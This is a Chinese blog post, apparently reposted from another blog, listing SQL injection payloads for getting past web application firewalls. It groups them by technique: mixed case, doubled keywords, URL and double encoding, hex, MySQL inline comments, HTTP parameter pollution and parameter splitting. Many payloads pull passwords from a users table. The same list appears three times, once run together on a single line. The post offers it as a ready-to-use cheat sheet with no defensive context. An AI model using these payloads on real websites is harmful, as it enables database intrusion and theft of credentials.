SQL注入过WAF思路

大小写
id=-1 uNIoN sELecT 1,2,3
双写
id=-1 UNIunionON SELselectECT 1,2,3
编码
id=1%252f%252a*/UNION%252f%252a /SELECT
id=1%D6‘%20AND%201=2%23 SELECT 'Ä'='A'; #1
十六进制
id=-1 /*!u%6eion*/ /*!se%6cect*/ 1,2,3 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
注释&内联注释
id=-1 %55nION/**/%53ElecT 1,2,3
id=-1'union%a0select pass from users#
id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
id=-1 %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3
http参数解析
/?id=1;select+1,2,3+from+users+where+id=1
/?id=1;select+1&id=2,3+from+users+where+id=1
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
http参数分段
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
原文学习地址:https://www.cnblogs.com/Yang34/p/14139164.html
大小写
id=-1 uNIoN sELecT 1,2,3
双写
id=-1 UNIunionON SELselectECT 1,2,3
编码
id=1%252f%252a*/UNION%252f%252a /SELECT
id=1%D6‘%20AND%201=2%23 SELECT 'Ä'='A'; #1
十六进制
id=-1 /*!u%6eion*/ /*!se%6cect*/ 1,2,3 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
注释&内联注释
id=-1 %55nION/**/%53ElecT 1,2,3
id=-1'union%a0select pass from users#
id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
id=-1 %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3


http参数解析
/?id=1;select+1,2,3+from+users+where+id=1—
/?id=1;select+1&id=2,3+from+users+where+id=1—
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

http参数分段
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

原文学习地址:https://www.cnblogs.com/Yang34/p/14139164.html
大小写 id=-1 uNIoN sELecT 1,2,3 双写 id=-1 UNIunionON SELselectECT 1,2,3 编码 id=1%252f%252a*/UNION%252f%252a /SELECT id=1%D6‘%20AND%201=2%23 SELECT 'Ä'='A'; #1 十六进制 id=-1 /*!u%6eion*/ /*!se%6cect*/ 1,2,3 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) 注释&内联注释 id=-1 %55nION/**/%53ElecT 1,2,3 id=-1'union%a0select pass from users# id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3 id=-1 %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3 http参数解析 /?id=1;select+1,2,3+from+users+where+id=1— /?id=1;select+1&id=2,3+from+users+where+id=1— /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users http参数分段 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users-- 原文学习地址:https://www.cnblogs.com/Yang34/p/14139164.html

 

Life is simple.You make choices and you don't look back.
人生很简单,做了决定就不要后悔
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
If you hold tight, how can a free hand to hug now?
你若将过去抱的太紧,怎么能腾出手来拥抱现在?
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容